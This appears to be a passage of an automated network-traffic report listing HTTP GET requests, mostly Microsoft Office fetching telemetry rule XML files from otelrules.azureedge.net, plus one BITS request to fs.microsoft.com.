Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
